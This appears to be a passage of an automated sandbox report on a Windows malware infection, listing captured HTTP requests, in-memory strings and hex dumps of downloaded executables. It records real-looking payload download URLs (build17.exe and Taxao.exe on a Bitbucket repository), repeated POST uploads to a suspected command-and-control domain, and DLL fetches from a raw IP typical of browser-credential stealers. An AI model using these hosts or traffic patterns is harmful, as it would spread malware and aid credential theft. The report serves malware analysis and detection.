00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:29 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:29 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 26 Oct 2021 10:18:30 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 27 Oct 2021 10:18:30 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/build17.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/c8550f1d-c01f-4e90-b203-096040eab0a5/build17.exe?Signature=d1Q4kDrNefh8flM56O9HjpukLbc%3D&Expires=1635245205&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=_SHespFRgAw4oIOHESVoeGe0bV7HH580&response-content-disposition=attachment%3B%20filename%3D%22build17.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fpoun.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hyphlcj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 206Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bjids.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uhvwsix.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ywnjvr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gdexrdsu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qfwytqyx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wxdyri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://btuxwhqhi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mkfnhxvt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bdkqmcnwul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ybhqredled.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://blfot.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omtfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 284Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lbogbgbuwy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lxiqp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 359Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://iasspuo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: wedoepicsht.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cnfwnf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://omlspe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 253Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vmnbd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wtdiibg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://huqgnk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fweeaoqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://oaqnv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://owfpwtmb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ctchjnbd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qqhcubp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tsxmpl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gftyqi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xoeqotyq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jbvjnkymp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 191Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wbmrftkx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qdoie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: brandyjaggers.com
Source: global traffic	HTTP traffic detected: POST /upload/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ngdduvqscc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: brandyjaggers.com

Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe;
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe;.txtt64
Source: A8D4.exe, 0000001B.00000002.507764805.000000000B0C0000.00000004.00000040.sdmp	String found in binary or memory: http://bitbucket.org/abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exeonfig4F
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: A8D4.exe, 0000001B.00000002.508143079.000000000BCBD000.00000004.00000001.sdmp, CP8Z9ZN3KMVU03RJ.exe, 0000001D.00000000.500345760.000000000040A000.00000008.00020000.sdmp, Taxao[1].exe.27.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: explorer.exe, 00000003.00000000.283035317.0000000006840000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: mozglue[1].dll.27.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: softokn3[1].dll.27.dr	String found in binary or memory: http://www.mozilla.com0
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: A8D4.exe, 0000001B.00000002.508338072.000000000C1D5000.00000004.00000001.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/03816c1a-92b3-
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: softokn3[1].dll.27.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: A8D4.exe, 0000001B.00000003.469675574.000000000C1E1000.00000004.00000001.sdmp, temp.27.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: brandyjaggers.com

Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/build17.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/c8550f1d-c01f-4e90-b203-096040eab0a5/build17.exe?Signature=d1Q4kDrNefh8flM56O9HjpukLbc%3D&Expires=1635245205&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=_SHespFRgAw4oIOHESVoeGe0bV7HH580&response-content-disposition=attachment%3B%20filename%3D%22build17.exe%22 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /@lilocc HTTP/1.1Host: mas.to
Source: global traffic	HTTP traffic detected: GET /abobaajshdasdjk/zalupaaaaaaa/downloads/Taxao.exe HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bitbucket.org
Source: global traffic	HTTP traffic detected: GET /be841f15-ba7d-44ef-a2c3-578559359f2a/downloads/03816c1a-92b3-4594-a3f6-6b3bedcc9b58/Taxao.exe?Signature=X6OA%2BfswTdnTnpZhN%2FTguu6wjTI%3D&Expires=1635244566&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=5qays.Q7NMcKdIvyy3pF9kf3XJHnSkKZ&response-content-disposition=attachment%3B%20filename%3D%22Taxao.exe%22 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Connection: Keep-AliveHost: bbuseruploads.s3.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: wedoepicsht.com
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0Host: 65.108.80.190Connection: Keep-Alive
